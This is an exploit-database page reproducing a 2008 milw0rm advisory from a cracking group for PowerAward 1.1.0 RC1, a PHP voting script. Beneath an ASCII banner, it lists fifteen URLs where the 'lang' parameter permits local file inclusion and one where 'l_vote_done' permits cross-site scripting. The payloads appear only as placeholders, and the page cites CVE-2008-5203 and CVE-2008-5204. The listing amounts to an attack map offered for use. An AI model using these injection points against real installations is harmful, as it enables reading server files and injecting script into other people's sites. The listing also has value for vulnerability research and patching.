[] NeoSense
E X P L O I T S
title author type platform port cve id

poweraward 1.1.0 rc1 - Local File Inclusion / Cross-Site Scripting

Author: CraCkEr
type: webapps
platform: php
port: 
date_added: 2008-06-27 
date_updated: 2016-12-09 
verified: 1 
codes: OSVDB-50168;CVE-2008-5204;OSVDB-50167;CVE-2008-5203;OSVDB-50166;OSVDB-50165;OSVDB-50164;OSVDB-50163;OSVDB-50162;OSVDB-50161;OSVDB-50160;OSVDB-50159;OSVDB-50158;OSVDB-50157;OSVDB-50156;OSVDB-50155;OSVDB-50154;OSVDB-50151 
tags: 
aliases:  
screenshot_url:  
application_url: 
???????????????????????????????????????????????????????????????????????????????
??                             C r a C k E r                                ??
??          T H E   C R A C K   O F   E T E R N A L   M I G H T             ??
??????????????????????????????????????????????????????????????????????????????

 ?????      From The Ashes and Dust Rises An Unimaginable crack....      ?????
??????????????????????????????????????????????????????????????????????????????
??         [ Local File Include ]                  [XSS]                    ??
??????????????????????????????????????????????????????????????????????????????
:   Author   : CraCkEr                : :                                    :
?   Group    : uNiTeD CraCkiNg ForCE  ? ?                                    ?
?   Script   : PowerAward 1.1.0 RC1   ? ?         Register Globals :         ?
?   Download : SourceForge.net        ? ?                                    ?
?   Method   : GET                    ? ?          [?] ON   [ ] OFF          ?
?   Critical : High [????????]        ? ?                                    ?
?   Impact   : System access          ? ?                                    ?
? ????????????????????????????????????? ???????????????????????????????????? ?
?                              DALnet #crackers                             ??
??????????????????????????????????????????????????????????????????????????????
:                                                                            :
?  Release Notes:                                                            ?
?  ?????????????                                                             ?
?  Typically used for remotely exploitable vulnerabilities that can lead to  ?
?  system compromise.                                                        ?
?                                                                            ?

??????????????????????????????????????????????????????????????????????????????
??                             Exploit URL's                                ??
??????????????????????????????????????????????????????????????????????????????


[LFI]

http://localhost/path/agb.php?lang=[LFI]
http://localhost/path/angemeldet.php?lang=[LFI]
http://localhost/path/anmelden.php?lang=[LFI]
http://localhost/path/charts.php?lang=[LFI]
http://localhost/path/external_vote.php?lang=[LFI]
http://localhost/path/guestbook.php?lang=[LFI]
http://localhost/path/impressum.php?lang=[LFI]
http://localhost/path/index.php?lang=[LFI]
http://localhost/path/rss-reader.php?lang=[LFI]
http://localhost/path/statistic.php?lang=[LFI]
http://localhost/path/teilnehmer.php?lang=[LFI]
http://localhost/path/topsites.php?lang=[LFI]
http://localhost/path/votecode.php?lang=[LFI]
http://localhost/path/voting.php?lang=[LFI]
http://localhost/path/winner.php?lang=[LFI]


[XSS]

http://localhost/path/external_vote.php?l_vote_done=[XSS]



   Notes: More files are infected!!
   ?????


??????????????????????????????????????????????????????????????????????????????

Greets:
       The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS

??????????????????????????????????????????????????????????????????????????????
??                              © CraCkEr 2008                              ??
??????????????????????????????????????????????????????????????????????????????

# milw0rm.com [2008-06-28]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.